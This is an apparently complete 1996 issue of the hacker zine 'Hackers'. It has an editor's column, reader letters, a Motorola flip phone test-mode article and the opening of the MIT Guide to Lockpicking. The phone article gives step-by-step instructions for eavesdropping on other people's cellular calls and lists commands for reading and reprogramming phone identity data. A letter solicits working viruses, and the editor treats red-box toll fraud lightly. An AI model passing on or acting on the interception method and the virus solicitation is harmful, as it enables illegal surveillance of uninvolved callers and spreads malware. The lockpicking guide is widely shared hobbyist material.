* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #6, February, 1996

Edited by: Revolution

-------------------
Hackers Forums
-------------------
From the editor ............................... Revolution
Letters ................................ Hackers Worldwide

-------------------
Technology
-------------------
Motorola Flip Phone Fun ............................. Treker
MIT Guide to Lockpicking ...................... Ted the Tool
Yet Another Login Spoof ..................... Brent Barnhill

--------------------
Politics
--------------------
A Request for Action ............................. Jim Warren
Cyberspace Makes the Difference ... Voters Telecommunications Watch
The End .......................................... Revolution

-----------------------------------------------------------------------------
copyright 1996 by Mike Scanlon

All articles remain the property of their authors, and may be reprinted with their permission. This zine may be reprinted freely as a whole electronically; for hard copy rights mail the editor.

HACKERS is published monthly by Mike Scanlon. To be added to the subscription list or to submit articles, mail mrs3691@hertz.njit.edu
-----------------------------------------------------------------------------

* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #6, File #1 of 8

From the Editor

POW! Just like the sound effects of an old Batman rerun, Hackers is back at you with another issue of gutwrenching telecommunications adventure. Throw on your night vision goggles and don't forget your polka dotted box, cover me honey, I'm going in!
The last couple of weeks hoodlums at NJIT have been seen passing the early semester blues by red boxing to Brazil, and ordering long distance coverage and 500 number service to the pay phones in the surrounding area. Some of these hoodlums appear to have obvious behavioral problems.

But I've been steering clear of all that, concentrating on the mag. This issue has a few tech articles, along with a favorite of mine: although it is from 1991 it is mostly still valid, the MIT Guide to Lockpicking. Politically, a lot has been going on in cyberspace to be happy about, but much more work is still to be done. More information concerning the state of the legislation involving the internet will be in next month's issue.

For those of you who haven't heard, Defcon will be happening this July, the 26th through the 28th, in Las Vegas. More info on this can be had at http://www.defcon.com. There is also a voice bridge set up by the promoters of the event at (801) 855-3326. I have a VMB set up at that number, box 2537, if anybody wants to leave me a message and prefers not to use the answering machine I have set up for the purpose. But some people are impressed by those types of things.

Anyway, I am STILL looking for somebody to handle the bug and virus of the month columns; if anyone finds the time or interest, drop me a line. I haven't made the 2600 meeting as I promised, but in the future I will try to make it. Other projects I've been talking about every month but never gotten around to doing: putting up a decent website, and setting up a telnetable site. Both of these I promise to look into by....summer. :)

Well, I've been spending the better part of my waking hours trying to think of cool things I could do to increase reader participation in the zine. I came up with one thing we could do for next issue. A reader's write contest!
For next issue, as this is "Hackers" magazine, in 2 billion words or less, describe the best hack you have ever heard of, or even better, the best hack that you have ever pulled off. The winner will receive an adequate no-prize that I haven't decided upon yet...but all the submissions will be printed, so hopefully we'll have some comic relief next issue. So write yours today, and let's see some submissions! Mrs3691@hertz.njit.edu.

- Revolution

* * * * * * * * * * * * * * * * * * * *

As always, the standard disclaimer applies. All of these articles are provided for informational purposes only; Mike Scanlon and the respective authors cannot be held accountable for any illegal acts they are used to commit.

* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #6, File #2 of 8

Letters

From 0200717@ACAD.NWMISSOURI.EDU Wed Jan 17 12:49:37 1996
Date: Thu, 11 Jan 1996 11:58:49 -0600 (CST)
From: RYAN ECCLES <0200717@ACAD.NWMISSOURI.EDU>
To: mrs3691@hertz.njit.edu
Subject: Hackers

Revolution,

Please include the following request in the next edition of Hackers. I will be writing a cd-rom soon. I would like to write a cd-rom containing viruses. This cd-rom can be used to load viruses to your computer in order to test the effectiveness of your current virus scanner. Unfortunately, I don't have 650MB of viruses. I know that most of you have a few viruses laying around, and I would like them. I don't have the largest account in the world either, so snail mail is the preferred method of transport. If you have some viruses please send email to 0200717@acad.nwmissouri.edu and let me know the name of the virus (if known) and the size of the virus (if known). If I don't have the virus or viruses I will email my address to you. Please pkzip the file, place it on a 3.5 disk or an iomega zip disk. All disks will be returned upon request.
Contributors may receive a copy of the cd for 15 (slightly over the cost of a blank cd rom...keep in mind it takes a couple hours to write a cd correctly...and it may take time to get 650 MB of viruses from you.) All info from contributors will be confidential unless otherwise requested. NO RECORDS WILL BE KEPT! This keeps both you and me out of trouble. REMEMBER THIS DISK IS ONLY PROVIDED FOR SECURITY PURPOSES. I prefer to have working viruses, and descriptions of the viruses as well as what they do.

Thanks HACKERS, HACK ON!

-----------------------------------------------------------------------------

From wyle@max.tiac.net Mon Jan 29 19:59:26 1996
Date: Sat, 27 Jan 1996 12:56:52 -0501 (EST)
From: Wyld Wyle
To: michael r scanlon cis stnt
Subject: Re: Hackers #5

Dear Mike,

I don't know if this is of any help to you, but I have a number that will tell you what telephone number you are calling from, i.e. if you were calling from a pay phone or a phone in an office and you wanted to know what that number is, you would call it. It's also good for if you want the number of a line that a computer is using for a data line. Also bear in mind that I am from Boston and I don't know if it will work anywhere else, but it is a 1-800 number so it might. It is 1-800-my-ani-is. After you dial you will hear a beeping noise (the beep will continue), just type in the code. The code is either 22 or 20, I forget. Well, hope this is of some help to you.

-Wyle

P.S. E-mail me back and let me know if it worked!

[Wyle emailed me again and told me the code is 220. Although this number works nationally, there are three digit numbers to call from every region that will also give you your ANI; find yours out from your local BBS. Here in Newark, and I think all of 201, the code is 958.
- Revolution]

-----------------------------------------------------------------------------

From: IN%"hardguy@continuity.it.com.au" 26-JAN-1996 21:55:20.52
To: IN%"scanlonr@delphi.com"
CC:
Subj: Article update

In reference to Aftermath's article on Beigeboxing In Australia (issue #4, file #4 of 9). The number to call (from anywhere) to check what number you are calling from is 1114. 1115 also works hopefully. 111x also produces linesman test tones.

-h

-----------------------------------------------------------------------------

* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #6, File #3 of 8

***************************
* Motorola Flip Phone Fun *
*           By            *
*          Treker         *
***************************

So you got yourself a new Motorola Flip Phone, and now that you have talked to someone goin 100 down the highway you want to have some real fun. Well, one way is to use the Test Mode commands; these are used to test the phone and set some of its features. To use the test mode commands you must first get into test mode. Now, to do this with your average flip phone is pretty simple, and here's how:

1. Take off your battery.

2. Look at the back side of the phone where the battery used to be and locate the three notches at the bottom.

3. Two prongs should be sticking out from the side notches. (See Diagram)

   The three prongs (notice the middle does not have a prong sticking out of it; also notice that on the battery there are also three contacts, but none of them stick out):

       ---     ---     ---
      |   |   |   |   |   |
      | / |   |   |   | / |
      |   |   |   |   |   |
       ---     ---     ---

4. The prongs are where the battery contacts connect with the phone.

5. To get into test mode you must create a prong for the middle notch so it makes contact with the middle contact on the battery.

6. To make the prong you could use tin foil and just stick it into the middle notch so it makes contact with the battery.
   Any conductive piece of metal will make a good prong, just as long as it makes contact with the battery.

7. Now replace the battery and turn on the phone. If it lights up normally it did not work, so take off your battery and adjust your prong so it definitely makes contact with the battery. But if you see a bunch of numbers flashing on the display, you are in test mode.

   Notice: If the phone doesn't even light up it's probably because the prong is touching one of the other contacts, so just adjust your middle prong until it works.

Now that you are in Test Mode it's time for some commands. To use the commands you must press the # key and you will see:

    US '

This means you are ready to enter commands! I will give you a complete list below of the commands, but I would like to spend a little time on one in particular, test mode command #11. This is used to change cell channels, and through this you can monitor other calls!! Yes, you read me correct, you can listen to other people going 100 down the freeway. To get it working you must first unmute audio or the conversations will be too faint, so enter test mode command 08 at the prompt and you should hear some noise in the speaker. Then to change the channels, enter 11xxxx, where x equals the channel you want to listen to. In my area most of the action happens in the 380 area, so I would enter 11380 at the prompt. But the best way to find a conversation is just to scan around randomly. In a big city you should get at least a couple of conversations. A channel without a conversation just sounds like static, just thought you should know.

Below is the complete (up to date is a better word) list of test mode commands. Some of them are useful and some of them are useless, but beware: some of these commands could screw the phone up some good.

----------------------------CUT-HERE----------------------------------

#    Enter Test Command Mode

00#  no function

01#  Restart (Re-enter DC power start-up routine.)
     On TDMA telephones, this command has the same effect as pressing the PWR button.

02#  Display Current Telephone Status (This is a non-altering version of the STATUS DISPLAY. On a 14 character display, all the information is shown. On a 7 character display only the information on the second line of a 14 character display is shown. On a 10 character display, all the information on the second line of a 14 character display plus the last three characters of the first line are shown.)

     STATUS DISPLAY, ALTERNATES BETWEEN:

       AAA BBB     AAA = Channel Number (decimal)
                   BBB = RSSI reading for channel

       CDEFGHI     C = SAT frequency (0=5970, 1=6000, 2=6030, 3=no channel lock)
                   D = Carrier (0=off, 1=on)
                   E = Signalling tone (0=off, 1=on)
                   F = Power attenuation level (0 through 7)
                   G = Channel mode (0=voice channel, 1=control channel)
                   H = Receive audio mute (0=unmuted, 1=muted)
                   I = Transmit audio mute (0=unmuted, 1=muted)

     Press * to hold display and # to end.

03#  Reset Autonomous Timer. This command results in the reset of the autonomous timer but does not provide any test function on these models.

04#  Initializes Telephone to Standard Default Conditions: Carrier Off, Power Level 0, Receiver Audio Muted, Transmit Audio Muted, Signalling Tone Off, SAT Off, Resetting of Watch-Dog Timer Enabled, DTMF and Audio Tones Off, Audio Path Set to Speaker

05#  TX Carrier On (Key Transmitter)

06#  TX Carrier Off

07#  RX Audio Off (Mute Receiver Audio)

08#  RX Audio On (Unmute Receiver Audio)

09#  TX Audio Off

10#  TX Audio On

11(Ch.No.)#  Set Transceiver to Channel xxxx (Receive and Transmit in Decimal; accepts 1, 2, 3, or 4 digits). See end of file for more info on this command.

12x#  Set Power Step to x; (0,1-7) 0=Maximum Power (3 Watts) 7=Minimum Power Out

13#  Power Off (Shuts off the radio)

14#  10 kHz Signalling Tone On

15#  10 kHz Signalling Tone Off

16#  Setup (Transmits a five word RECC message; each of the five words will be "FF00AA55CC33." Transmitter de-keys at the end of the message.)
17#  Voice (Transmits a two word REVC message; each of the two words will be "FF00AA55CC33." Transmitter de-keys at the end of the message.)

18#  C-Scan (Allows for entry of as many as 5 negative SID's for each NAM.)

     Newer Motorola phones are equipped with a feature called C-Scan; this is an option along with the standard A/B system selections. C-Scan allows the phone to be programmed with up to five inhibited system ID's per NAM. This is designed to prevent the phone from roaming onto specified non-home systems and therefore reduce "accidental" roaming fees.

     1. C-Scan can only be programmed from test mode; power the phone up with the relevant test mode contact grounded (see above).
     2. Press # to access test mode.
     3. Press 18#, the phone will display "0 40000".
     4. Enter the first inhibited system ID and press *. Continue to enter additional system ID's if required. After the 5th entry the phone will display "N2". Press * to continue and add system ID's for NAM 2 as required.
     5. If an incorrect entry is made (outside the range of 00000-32767) the display will not advance; press CLR and re-enter. Use a setting of 40000 for any un-needed locations.
     6. When the last entry has been made press * to store and press # to exit, then turn off power.

     or [**Phones without the C-Scan option used this command to SEND NAM.**]

18#  SEND NAM. Display shows AA BB, where AA=Address and BB=Data. Displays the contents of the NAM, one address at a time, advanced by pressing the * key. The following data is contained in NAM. The test is exited by depressing the # key.

       SIDH
       Sec. Code
       OPT. (1,2,&3)
       MIN MIN1, MIN2
       FCHNA
       SCM
       FCHNB
       IPCH
       NDED
       ACCOLC
       CHKSUM
       GIM

19#  Display Software Version Number (4 digits displayed as year and week)

NOTE: Entering commands 20# through 23# or 27# causes the transceiver to begin a counting sequence or continuous transmission as described below.
In order to exit from the commands to enter another test command, the # key must be depressed; all other key depressions are ignored.

20#  Receive control channel messages counting correctable and uncorrectable errors. When the command starts, the number of the command will be displayed in the upper-right corner of the display. Entering a # key will terminate the command and display two three-digit numbers in the display. The first number is the number of correctable errors and the second is the uncorrectable errors.

21#  Receive voice channel messages counting correctable and uncorrectable errors. When the command starts, the number of the command will be displayed in the upper right-hand corner of the display. Entering a # key terminates the command and will display two three-digit numbers in the display. The first is the number of correctable errors and the second is the uncorrectable errors.

22#  Receive control channel messages counting word sync sequences. When the command starts, the number of the command will be displayed in the upper right-hand corner of the display. Entering a # key will terminate the command and display the number of word sync sequences in the display.

23#  Receive voice channel messages counting word sync sequences. When the command starts, the number of the command will be displayed in the upper right-hand corner of the display. Entering a # key will terminate the command and display the number of word sync sequences in the display.

24#  Receive control channel data and display the majority voted busy/idle bit. 0=idle 1=busy

25x#  SAT On
       When x=0, SAT=5970HZ
            x=1, SAT=6000HZ
            x=2, SAT=6030HZ

26#  SAT Off

27#  Transmit Data (Transmits continuous control channel data. All words will be "FF00AA55CC33." When the command starts, '27' will be displayed in the right side of the display. Entering a # key will terminate the command. The transmitter de-keys when finished.)
28#  Activate the high tone (1150 Hz +/- 55 Hz)

29#  De-activate the high tone

30#  Activate the low tone (770 Hz +/- 40 Hz)

31#  De-activate the low tone

32#  Clear (Sets non-volatile memory to zeroes or factory default. This command will affect all counters, all repertory memory including the last number called stack, and all user programmable features including the setting of System Registration. It does not affect the ESN, NAM, phasing data, or lock code. This takes a minute or so. DO NOT TURN OFF THE TELEPHONE WHILE THIS IS SHOWING '32' ON THE DISPLAY. WAIT UNTIL THE NORMAL SERVICE LEVEL DISPLAY RESUMES!)

33x#  Turn on DTMF for x (1-9, *, 0, #, plus the single tones)

       Where x=1  697 Hz + 1209 Hz        10  697 Hz
             2    697 Hz + 1336 Hz        11  770 Hz
             3    697 Hz + 1477 Hz        12  852 Hz
             4    770 Hz + 1209 Hz        13  941 Hz
             5    770 Hz + 1336 Hz        14  1150 Hz (not used in cellular)
             6    770 Hz + 1477 Hz        15  1209 Hz
             7    852 Hz + 1209 Hz        16  1336 Hz
             8    852 Hz + 1336 Hz        17  1477 Hz
             9    852 Hz + 1477 Hz        18  1633 Hz (not used in cellular)
             *    941 Hz + 1209 Hz
             0    941 Hz + 1336 Hz
             #    941 Hz + 1477 Hz

34#  Turn DTMF Off

35#  Display RSSI ("D" Series Portable Only)

or

35x#  Set Audio Path to x
       x=0, V.S.P Microphone (Applies to mobiles only.)
       x=1, Speaker
       x=2, Alert
       x=3, Handset
       x=4, Mute
       x=5, External Telephone (Applies to Portables Only)
       x=6, External Handset (Applies to NEWER Portables)

36nnn#  Scan (TDMA Telephones only. Scans the primary control channels and attempts to decipher the forward data stream. The display will show PASS1 if the strongest control channel was accessed, PASS2 if the second strongest was accessed, and FAIL if no control channel could be accessed.) (nnn=Scan speed in milliseconds). Tunes from channel 1 to 666 in order. Entering a * pauses the scan and displays current Channel Number and RSSI reading (AAA=Channel Number and BBB=RSSI Reading).
     When scan speed is 300 milliseconds or greater, the current status is displayed during the scan; when less than 300 milliseconds the status is displayed only during pause. Entering * during a pause causes the scan to resume. Entering # aborts the scan and leaves the mobile tuned to the current channel. During this command only the * and # keys are recognized.

37#  Sets Low Battery Threshold. Usage: #37#x# where x is any number from 1 to 255. If set to 1, the Low Battery indicator will come up when the phone is powered on. If set to 255, it may never come up.

38#  Display ESN (Displays ESN in four steps, two hexadecimal digits at a time in a four digit display. The decimal shows the address, 00 through 03, as the first two digits, and two digits of the ESN as the last two digits. Use the 'G' to step through the entire hexadecimal ESN.)

     Compander OFF ("D" Series Portables)

or

38#  SND-SNM. Display shows AA BB, where AA=Address; BB=Data. Send the SNM to the display. All 32 bytes of the SNM will be displayed, one byte at a time. The byte address will be displayed in the upper right-hand corner and the contents of that address will be displayed in hex. The * key is used to step through the addresses similar to the SEND-NAM (18#) command.

39#  Compander ON ("D" Series Portables)

or

39#  RCVSU. Receive one control channel word. When the word is received it is displayed in hex. This command will be complete when a control channel word is received or when the # key is entered to abort the command.

40#  RCVVC. Receive one voice channel word. When the word is received it is displayed in hex. This command will be complete when a voice channel word is received or when the # key is entered to abort the command.

41#  Enables Diversity (On F19CTA... Series only.)

42#  Disables Diversity (On F19CTA... Series only.)

43#  Disable Diversity USE T/R ANTENNA (On F19CTA... Series only.)
     USE R ANTENNA (On D.M.T./ Mini TAC)

44#  Disable Diversity USE R ANTENNA (On F19CTA... Series only.)
     USE T/R ANTENNA (On D.M.T./ Mini TAC)

45#  Display Current RSSI (Displayed as a three-digit decimal number)

46#  Display Cumulative Call Timer

47x#  Set RX Audio level to X
       (For F19CTA ...Series Transceivers)
         X=0, Lowest Volume
         X=6, Highest Volume
         X=7, mute
         Normal setting is 4.
       (For D.M.T./ Mini TAC Transceivers)
         X=0, Lowest Volume
         X=7, Highest Volume
         Normal setting is 4.
       (For TDMA Transceivers and F09F... Series and Higher Portables)
         X=0, Lowest Volume
         X=15, Highest Volume
         Normal setting is 2 to 4. (On TDMA Transceivers and Micro TAC portables, settings 8 through 15 are for DTMF applications only.)

48#  Side Tone On. Use this command in conjunction with 350# to test the entire audio path in hands-free applications.

49#  Side Tone Off

50#  Maintenance data is transmitted and test results displayed:
       PASS=received data is correct
       FAIL 1=2 second timeout, no data rec.
       FAIL 2=received data is incorrect

51#  Test of mobile where maintenance data is transmitted and looped back. Display is as follows:
       PASS=looped-back data is correct
       FAIL 1=2 second timeout, no looped-back data
       FAIL 2=looped-back data is incorrect

52x#  SAT Phase Adjustment. A decimal value that corresponds to phase shift compensation in 4.5 degree increments. Compensation added to inherent phase shift in transceiver to achieve a total of 0 degrees phase shift. Do NOT enter any values except those shown below.
       0 degrees =  0     121.5 degrees = 59     243.0 degrees =  86
       4.5       =  1     126.0         = 60     247.5         =  87
       9.0       =  2     130.5         = 61     252.0         = 112
      13.5       =  3     135.0         = 62     256.5         = 113
      18.0       =  4     139.5         = 63     261.0         = 114
      22.5       =  5     144.0         = 40     265.5         = 115
      27.0       =  6     148.5         = 41     270.0         = 116
      31.5       =  7     153.0         = 42     274.5         = 117
      36.0       = 16     157.5         = 43     279.0         = 118
      40.5       = 17     162.0         = 44     283.5         = 119
      45.0       = 18     166.5         = 45     288.0         = 120
      49.5       = 19     171.0         = 46     292.5         = 121
      54.0       = 20     175.5         = 47     297.0         = 122
      58.5       = 21     180.0         = 64     301.5         = 123
      63.0       = 22     184.5         = 65     306.0         = 124
      67.5       = 23     189.0         = 66     310.5         = 125
      72.0       = 48     193.5         = 67     315.0         = 126
      76.5       = 49     198.0         = 68     319.5         = 127
      81.0       = 50     202.5         = 69     324.0         = 104
      85.5       = 51     207.0         = 70     328.5         = 105
      90.0       = 52     211.5         = 71     333.0         = 106
      94.5       = 53     216.0         = 80     337.5         = 107
      99.0       = 54     220.5         = 81     342.0         = 108
     103.5       = 55     225.0         = 82     346.5         = 109
     108.0       = 56     229.5         = 83     351.0         = 110
     112.5       = 57     234.0         = 84     355.5         = 111
     117.0       = 58     238.5         = 85     360.0         =  70

53#  Enable scrambler option, when equipped.

54#  Disable scrambler option, when equipped.

55#  Display/Program N.A.M. (Test Mode Programming)

TEST MODE PROGRAMMING:

Assuming you have completed one of the above steps correctly, the phone will wake up in test mode when you turn the power on. When you first access test mode the phone's display will alternate between various status information that includes the received signal strength and channel number. The phone will operate normally in this mode. You can now access Service Mode by pressing the # key; the display will clear and a ' will appear. Use the following procedure to program the phone:

1. Enter 55# to access programming mode.
2. The * key advances to the next step. (NOTE that test mode programming does NOT have step numbers; each time you press the * key the phone will display the next data entry).
3. The CLR key will revert the display to the previously stored data.
4. The # key aborts programming at any time.
5. To complete programming you must scroll through ALL entries until a ' appears in the display.
6.
   Note that some entries contain more digits than can be displayed by the phone; in this case only the last part of the data can be seen.

TEST MODE PROGRAMMING DATA:

STEP#   # OF DIGITS/RANGE     DESCRIPTION
 01     00000 - 32767         SYSTEM ID
 02     8 DIGIT BINARY        OPTION PROGRAMMING, SEE NOTE 1 BELOW
 03     10 DIGITS             MIN (AREA CODE & TEL#)
 04     2 DIGITS              STATION CLASS MARK
 05     2 DIGITS              ACCESS OVERLOAD CLASS
 06     2 DIGITS              GROUP ID (10 IN USA)
 07     6 DIGITS              SECURITY CODE
 08     3 DIGITS              LOCK CODE
 09     3 DIGITS              SERVICE LEVEL (LEAVE AT 004)
 10     8 DIGIT BINARY        OPTION PROGRAMMING, SEE NOTE 2 BELOW
 11     8 DIGIT BINARY        OPTION PROGRAMMING, SEE NOTE 3 BELOW
 12     0333 OR 0334          INITIAL PAGING CHANNEL
 13     0333                  "A" SYSTEM IPCH
 14     0334                  "B" SYSTEM IPCH
 15     3 DIGIT NUMBER        PAGING CHANNEL (021 IN USA)
 16     8 DIGIT BINARY        OPTION PROGRAMMING, SEE NOTE 4 BELOW

Steps 01 through 06 and 12 will repeat for NAM 2 if the second phone number bit has been enabled in step 11.

NOTES: Take care with Motorola's use of "0" and "1". Some options use "0" to enable, some use "1". These are eight digit binary fields used to select the following options:

1. (step 02 above, suggested entry is: 11101001 for "A" system, 10101001 for "B" sys)
   Digit 1: Local use mark, 0 or 1.
   Digit 2: Preferred system, 0 or 1.
   Digit 3: End to end (DTMF) dialing, 1 to enable.
   Digit 4: Not used, enter 0.
   Digit 5: Repertory (speed) dialing, 1 to enable.
   Digit 6: Auxiliary (horn) alert, 1 to enable.
   Digit 7: Hands free (VSP) auto mute, 1 to enable (mutes outgoing hands free audio until the MUTE key is pressed).
   Digit 8: Min mark, 0 or 1.

2. (step 10 above, suggested entry is: 00000100)
   Digits 1 - 4: Not used in USA, enter 0.
   Digit 5: Single system scan, 1 to enable (scan A or B system only, determined by bit 2 of step 02. Set to "0" to allow user the option).
   Digit 6: Super speed dial, 1 to enable (pressing N, or NN SND will dial the number stored in memory location NN).
   Digit 7: User selectable service level, 0 to enable (allows user to
            set long distance/memory access dialing restrictions).
   Digit 8: Lock function, 0 to enable (allows user to lock/un-lock the phone; if this is set to 1 the phone can not be locked).

3. (step 11 above, suggested entry is: 00000000)
   Digit 1: Handset programming, 0 to enable (allows access to programming mode without having to enter test mode).
   Digit 2: Second phone number (not all phones), 1 to enable.
   Digit 3: Call timer access, 0 to enable.
   Digit 4: Auto system busy redial, 0 to enable.
   Digit 5: Speaker disable, 1 to enable (use with select VSP units only, do not use with 2000 series mobiles).
   Digit 6: IMTS/Cellular, 1 to enable (rarely used).
   Digit 7: User selectable system registration, 0 to enable.
   Digit 8: Dual antennae (diversity), 1 to enable.

4. (step 16 above, suggested entry is: 0011010 for portable and 0011011 for mobile units)
   Digit 1: Not used, 0 only.
   Digit 2: Not used, 0 only.
   Digit 3: Continuous DTMF, 1 to enable (software version 8735 and later).
   Digit 4: 8 hour time-out, 0 to enable (software version 8735 and later).
   Digit 5: Not used, 0 only.
   Digit 6: Failed page indicator, 0 to enable (phone beeps when an incoming call is detected but signal conditions prevent completion of the call).
   Digit 7: Portable scan, 0 for portable, 1 for mobile units.

56#  no function

57x#  Call Processing Mode
       x=0, AMPS
       x=1, NAMPS
       x=2-4, RESERVED
       x=5, TDMA signalling
       x=6, TDMA signalling with loopback before decoding
       x=7, TDMA signalling with loopback voice after decoding
       x=8, TDMA signalling with loopback FACCH after decoding
       x=9, TDMA forced synchronization

58#  Compander On (Audio compressor and expander) (See 39#)

59#  Compander Off (Audio compressor and expander) (See 38#)

60#  no function

61#  ESN Transfer (For Series I D.M.T./Mini TAC only)

62#  Turn On Ringer Audio Path

63#  Turn Off Ringer Audio Path

64#-65#  no function

66#  Identity Transfer (Series II Transceivers and some Current Shipping Portables)

67#  no function

68#  Display FLEX and Model Information

69#  Used with Identity Transfer

70#  Abbreviated field transmitter audio deviation command, for transceivers with FCC ID ABZ89FT5668.

71#  Abbreviated field power adjustment command, for transceivers with FCC ID ABZ89FT5668.

72#  Field audio phasing commands.

73#  Field power adjustment command.

74#-99#  no function

* * * * * * * * * * * * * * * * * * * *

-= H A C K E R S =-

Issue #6, File #4 of 8

MIT Guide to Lockpicking
Ted the Tool

As I promised, here is the edited text to the MIT GUIDE TO LOCKSMITHING. It's in the next 10 messages. Enjoy! The file's available for download from my BBS as MITGUIDE.ZIP. Can be F'Reqed. The editing corrected the colossal number of spelling and grammatical errors I found.

Regards,
Poor Richard...

+...................................................................+
.  richard.bash@f68.n105.z1.fidonet.org        Combat Arms BBS      .
.  Also: dickbash@rigel.cs.pdx.edu             P.O. Box 913         .
.  Fido 1:105/68                               Portland, OR 97201   .
.  Voice: 1-503-223-3160  BBS: 1-503-221-1777  Shop: 1-503-640-3209 .
+...................................................................+

Combat Arms BBS
P.O. Box 913
Portland, Oregon 97207-0913
Voice: (503) 223-3160
BBS: (503) 221-1777
Fido 1:105/68

November 10, 1993

MIT Guide to Lockpicking
by
Ted the Tool
February 14, 1992

Distribution

Copyright 1987, 1991 Theodore T. Tool. All rights reserved.
Permission to reproduce this document on a non-profit basis is granted provided that this copyright and distribution notice is included in full. The information in this booklet is provided for educational purposes only.

August 1991 revision.

Contents

1  It's Easy
2  How a Key Opens a Lock
3  The Flatland Model
4  Basic Picking & The Binding Defect
5  The Pin Column Model
6  Basic Scrubbing
7  Advanced Lockpicking
   7.1  Mechanical Skills
   7.2  Zen and the Art of Lockpicking
   7.3  Analytic Thinking
8  Exercises
   8.1  Exercise 1: Bouncing the pick
   8.2  Exercise 2: Picking Pressure
   8.3  Exercise 3: Picking Torque
   8.4  Exercise 4: Identifying Set Pins
   8.5  Exercise 5: Projections
9  Recognizing and Exploiting Personality Traits
   9.1  Which Way To Turn
   9.2  How Far to Turn
   9.3  Gravity
   9.4  Pins Not Setting
   9.5  Elastic Deformation
   9.6  Loose Plug
   9.7  Pin Diameter
   9.8  Beveled Holes and Rounded pins
   9.9  Mushroom Driver Pins
   9.10 Which Way To Turn
   9.11 Which Way To Turn
   9.12 Which Way To Turn
   9.13 Disk Tumblers
10 Final Remarks
A  Tools
   A.1  Pick Shapes
   A.2  Street cleaner bristles
   A.3  Bicycle spokes
   A.4  Brick Strap
B  Legal Issues

INTRODUCTION

Hello,

My pseudonym is Ted The Tool. I wrote the "MIT Guide To Lockpicking." Over the years I have followed this list and seen many requests for the Guide in electronic form. For various reasons I did not want to post it.

Over the summer I changed my mind, and decided to post it as a postscript file. A postscript file would allow many people to print it, while still allowing me some artistic control over derivative works. I had planned to make several improvements before posting it, but that seems moot now.

So, I will be posting the original postscript file as a series of six e-mail messages. Each message is about 62,000 bytes long so they will pass through most mail forwarders. The messages form a uuencoded, compressed, postscript file. To reconstruct the guide, 1) remove the mail headers from the messages, 2) concatenate them together (Unix cat command) to make a file called MITLockGuide.ps.Z.uu, 3) run the uudecode command on the resulting file to create the file MITLockGuide.ps.Z, and 4) run uncompress on that file to create MITLockGuide.ps, which you can send to a printer with the lpr command. The result will be a file called MITLockGuide.ps with a length of 818540 bytes and sum of "32380 800."

I would like to find some repositories for the Guide.
If you have an FTP site, and are willing to keep a copy of the guide, please do so, and send me a message telling me its location, so I can tell other people who want a copy of it. I do not want to get into the business of mailing out individual copies via e-mail. I would like to make it easy for other people to find via archie, gopher, etc. If you are keeping a copy, please use the name MITLockGuide.ps (or MITGuide.ps if you have 8 character limits on file names). . I would appreciate the following help: - Convert the Guide to other formats so it can be . printed on non-postscript printers. Please let me know . about it, and post a message to alt.locksmithing. - Convert the figures into a format that a modern . graphics program can manipulate. The figures were made . using the Illustrate program on a Symbolics . LispMachine (it was a nice machine in its day :-). . Please send the result back to me, and if you wish, . post it to the net. - Write new subsections on lock defects and how to . exploit them for different kinds of pin-tumbler locks. - Write a chapter on disk tumbler locks that includes a . discussion of the "pick-resistant" modifications (vee- . shaped notch in the disk that has a similar effect as . a mushroom-shaped driver. - Write a chapter on Best locks that explains the . removable core feature (with pictures please), and . describes how to exploit the very high tolerances that . are used in manufacturing these locks. - Expand the appendix on legal issues to cover all 50 . states. Ideally, I would like a chart that showed the . requirements necessary to legally carry lockpicks in . each state. - Describe other practice exercises that help people . learn the skills of lockpicking. - Write similar guides for other types of locks. For . example, there could be a guide for ACE-type tubular . locks, and one for Simplex push-button locks. In my . mind, the Guide was intended to just cover pin-tumbler . locks, though the title is bigger than that. 
Perhaps, . if the other guides are small and there authors wanted . to, they could be added as chapters to the Guide. - Any other additions you would like. . I would like the Guide to become the locksmithing equivalent of GNU Emacs, which is something that is freely distributed that many people contribute to. This is a great opportunity for you to share your experience with other people who share your interest in locks. Sincerely, Ted The Tool . --------------------------------------------------------- . To find out more about the anon service, send mail to help@anon.penet.fi. Due to the double-blind, any mail replies to this message will be anonymized, and an anonymous id will be allocated automatically. You have been warned. Please report any problems, inappropriate use, etc. to admin@anon.penet.fi. .... Chapter 1 .... IT'S EASY . The big secret of lockpicking is that it's easy. Anyone can learn how to pick locks. . The theory of lockpicking is the theory of exploiting mechanical defects. There are a few basic concepts and definitions but the bulk of the material consists of tricks for opening locks with particular defects or characteristics. The organization of this manual reflects this structure. The first few chapters present the vocabulary and basic information about locks and lockpicking. There is no way to learn lockpicking without practicing, so one chapter presents a set of carefully chosen exercises that will help you learn the skills of lockpicking. The document ends with a catalog of the mechanical traits and defects found in locks and the techniques used to recognize and exploit them. The first appendix describes how to make lockpicking tools. The other appendix presents some of the legal issues of lockpicking. . The exercises are important. The only way to learn how to recognize and exploit the defects in a lock is to practice. This means practicing many times on the same lock as well as practicing on many different locks. 
Anyone can learn how to open desk and filing cabinet locks, but the ability to open most locks in under thirty seconds is a skill that requires practice. . Before getting into the details of locks and picking, it is worth pointing out that lockpicking is just one way to bypass a lock, though it does cause less damage than brute force techniques. In fact, it may be easier to bypass the bolt mechanism than to bypass the lock. It may also be easier to bypass some other part of the door or even avoid the door entirely. Remember: There is always another way, usually a better one. .... Chapter 2 ... HOW A KEY OPENS A LOCK . This chapter presents the basic workings of pin tumbler locks, and the vocabulary used in the rest of this booklet. The terms used to describe locks and lock parts vary from manufacturer to manufacturer and from city to city, so even if you already understand the basic workings of locks, you should look at Figure 2.1 for the vocabulary. . Knowing how a lock works when it is opened by a key is only part of what you need to know. You also need to know how a lock responds to picking. Chapters 3 and 5 present models which will help you understand a lock's response to picking. . Figure 2.1 introduces the vocabulary of real locks. The key is inserted into the "keyway" of the "plug." The protrusions on the side of the keyway are called "wards." Wards restrict the set of keys that can be inserted into the plug. The plug is a cylinder which can rotate when the proper key is fully inserted. The non-rotating part of the lock is called the "hull." The first pin touched by the key is called pin one. The remaining pins are numbered increasingly toward the rear of the lock. . The proper key lifts each pin pair until the gap between the "key pin" and the "driver pin" reaches the "sheer line." When all the pins are in this position, the plug can rotate and the lock can be opened. 
